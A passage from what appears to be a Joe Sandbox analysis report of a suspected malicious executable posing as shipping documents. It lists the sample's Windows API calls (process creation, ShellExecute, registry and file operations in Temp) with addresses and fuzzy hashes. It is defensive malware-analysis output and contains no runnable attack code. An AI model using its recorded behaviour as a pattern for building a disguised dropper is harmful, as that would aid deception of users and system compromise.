                                        • CreateProcessW.KERNELBASE(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B63
                                        • CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B70
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: CloseCreateHandleProcess
                                        • String ID:
                                        • API String ID: 3712363035-0
                                        • Opcode ID: 6fd2602221babf1a8a9a6246b82f99e4ae13039f11edd6951af80fecf8f79ee2
                                        • Instruction ID: b1032d8704f3223f2a9afbe03a7757fefc60a77e8ecf1711bb84520e71ece662
                                        • Opcode Fuzzy Hash: 6fd2602221babf1a8a9a6246b82f99e4ae13039f11edd6951af80fecf8f79ee2
                                        • Instruction Fuzzy Hash: 91E09AB4600219BFEB109B74AD06F7B767CE704604F408475BD15E2151D774A8158A78
                                        APIs
                                        • GetModuleHandleA.KERNEL32(?,00000020,?,00403642,0000000C,?,?,?,?,?,?,?,?), ref: 0040695D
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00406978
                                          • Part of subcall function 004068DB: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068F2
                                          • Part of subcall function 004068DB: wsprintfW.USER32 ref: 0040692D
                                          • Part of subcall function 004068DB: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406941
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                        • String ID:
                                        • API String ID: 2547128583-0
                                        • Opcode ID: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                        • Instruction ID: ff64ee7455e026c1647d72c339307a336527f79dacb59e64982fca04d7429b22
                                        • Opcode Fuzzy Hash: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                        • Instruction Fuzzy Hash: 38E08673504210AFD61057705D04D27B3A89F85740302443EF946F2140DB34DC32ABA9
                                        APIs
                                        • GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe,80000000,00000003), ref: 0040604B
                                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: File$AttributesCreate
                                        • String ID:
                                        • API String ID: 415043291-0
                                        • Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                        • Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
                                        • Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                        • Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15
                                        APIs
                                        • GetFileAttributesW.KERNELBASE(?,?,00405C27,?,?,00000000,00405DFD,?,?,?,?), ref: 00406027
                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 0040603B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                        • Instruction ID: 97cbb32404f08d1f6fed837f871d2b37f55cf766f9720be9b575451f5cdabe77
                                        • Opcode Fuzzy Hash: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                        • Instruction Fuzzy Hash: A3D0C972504220AFC2102728AE0889BBB55EB542717028A35FCA9A22B0CB304CA68694
                                        APIs
                                        • CreateDirectoryW.KERNELBASE(?,00000000,00403525,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405B0B
                                        • GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405B19
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: CreateDirectoryErrorLast
                                        • String ID:
                                        • API String ID: 1375471231-0
                                        • Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                        • Instruction ID: 8c4969e502f5bc4c8dfdefb7e9c2ba363b64d1215f12130c86bef4ebeef6f559
                                        • Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                        • Instruction Fuzzy Hash: 19C08C30310902DACA802B209F087173960AB80340F158439A683E00B4CA30A065C92D
                                        APIs
                                        • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 0040174E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: PathSearch
                                        • String ID:
                                        • API String ID: 2203818243-0
                                        • Opcode ID: d808a61f5ad900bf7ed85ac91a182ba8082c891450206748c020b13630da23e4
                                        • Instruction ID: 361b5ea4dce5ff5b5c0a009366d47470cb0510696b1a56dfa9010847a1c89de2
                                        • Opcode Fuzzy Hash: d808a61f5ad900bf7ed85ac91a182ba8082c891450206748c020b13630da23e4
                                        • Instruction Fuzzy Hash: 21E08071204104ABE700DB64DD49EAE77BCDF5036CF20553BE511E60D1E7B45905971D
                                        APIs
                                        • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E5C,00000000,?,?), ref: 0040641B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID:
                                        • API String ID: 2289755597-0
                                        • Opcode ID: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                        • Instruction ID: 64249f1610b479570df181ce2e9e182bf10c6facee3c5f7fb09e5bef7ea49c41
                                        • Opcode Fuzzy Hash: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                        • Instruction Fuzzy Hash: E6E0E672010109BFEF095F90DD4AD7B7B1DE708310F11492EF906D5051E6B5E9305674
                                        APIs
                                        • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034E7,00000000,00000000,0040330B,000000FF,00000004,00000000,00000000,00000000), ref: 004060DE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: FileRead
                                        • String ID:
                                        • API String ID: 2738559852-0
                                        • Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                        • Instruction ID: a77d82ba430c16999eb1f2306cb11816df14181100402a9e04059793f1b3015d
                                        • Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                        • Instruction Fuzzy Hash: 21E08632150219ABCF10DF948C00EEB3B9CFF04390F018436FD11E3040D630E92197A4
                                        APIs
                                        • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040349D,00000000,0041EA20,000000FF,0041EA20,000000FF,000000FF,00000004,00000000), ref: 0040610D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: FileWrite
                                        • String ID:
                                        • API String ID: 3934441357-0
                                        • Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                        • Instruction ID: 78408803ccc59d93ae5352641a5e7b8f709900c8df5e8e9e13d69f82a1dcf02f
                                        • Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                        • Instruction Fuzzy Hash: 8FE08C3220021ABBCF109E908C00EEB3FACEB003A0F014432FA26E6050D670E83097A4
                                        APIs
                                        • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000000,?,00406452,?,?,?,?,Exec,?,00000000), ref: 004063E8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: Open
                                        • String ID:
                                        • API String ID: 71445658-0
                                        • Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                        • Instruction ID: e31b8ecfa4924c4a0859a1c58e61cb12282203f41ec30ad4fda9f6d7c72ae418
                                        • Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                        • Instruction Fuzzy Hash: 68D0123200020DBBDF115E91ED01FAB3B1DAB08310F014426FE16E5091D776D570A764
                                        APIs
                                        • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015B3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: e4d35ef24f86c86e365822f81ff15bb63714950be14a167d72dedfa96a9168d0
                                        • Instruction ID: b7b437a2ec26925c6232407c7e58ab903e49824199ec6a3f71ab3ccdd8f320e3
                                        • Opcode Fuzzy Hash: e4d35ef24f86c86e365822f81ff15bb63714950be14a167d72dedfa96a9168d0
                                        • Instruction Fuzzy Hash: 81D05B72B08104DBDB01DBE8EA48A9E73B4DB50338B21893BD111F11D0D7B8C545A71D
                                        APIs
                                        • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404534
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: 8dc2ea4a8cffd810c80330d43262312fa0f844130cc7d84a637c392e617d0b66
                                        • Instruction ID: 7d988476d572be30e71f68111afb2513933db934ea5b2002f3fecefde51a3b0c
                                        • Opcode Fuzzy Hash: 8dc2ea4a8cffd810c80330d43262312fa0f844130cc7d84a637c392e617d0b66
                                        • Instruction Fuzzy Hash: ACC04C717402007BDA209F50AD49F07775467A0702F1494797341E51E0C674E550D61C
                                        APIs
                                        • ShellExecuteExW.SHELL32(?), ref: 00405B8C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: ExecuteShell
                                        • String ID:
                                        • API String ID: 587946157-0
                                        • Opcode ID: accb29398adcd6f2598047f0fcddae8b07494e52d9cc9fcafc25c5f5f83f3143
                                        • Instruction ID: 080962bbef7e268e86b0d243ececfcd1ad47764945baea7f73af6130fa7b9bd6
                                        • Opcode Fuzzy Hash: accb29398adcd6f2598047f0fcddae8b07494e52d9cc9fcafc25c5f5f83f3143
                                        • Instruction Fuzzy Hash: A9C092F2100201EFE301CF80CB09F067BE8AF54306F028058E1899A060CB788800CB29
                                        APIs
                                        • SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: 5e23afa4ba150cac51e31494d2c9f0ee7f8efb4361c8cf2b7a73957f204a5961
                                        • Instruction ID: 777369a795cbaa9bd4fd16da76cbada5404ff361b75e364c58eeef3f96c31ac9
                                        • Opcode Fuzzy Hash: 5e23afa4ba150cac51e31494d2c9f0ee7f8efb4361c8cf2b7a73957f204a5961
                                        • Instruction Fuzzy Hash: 6BB09235181600AADA115B40DE09F867BA2E7A4701F029438B340640B0CBB210A0DB08
                                        APIs
                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403247,?), ref: 004034F8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmp
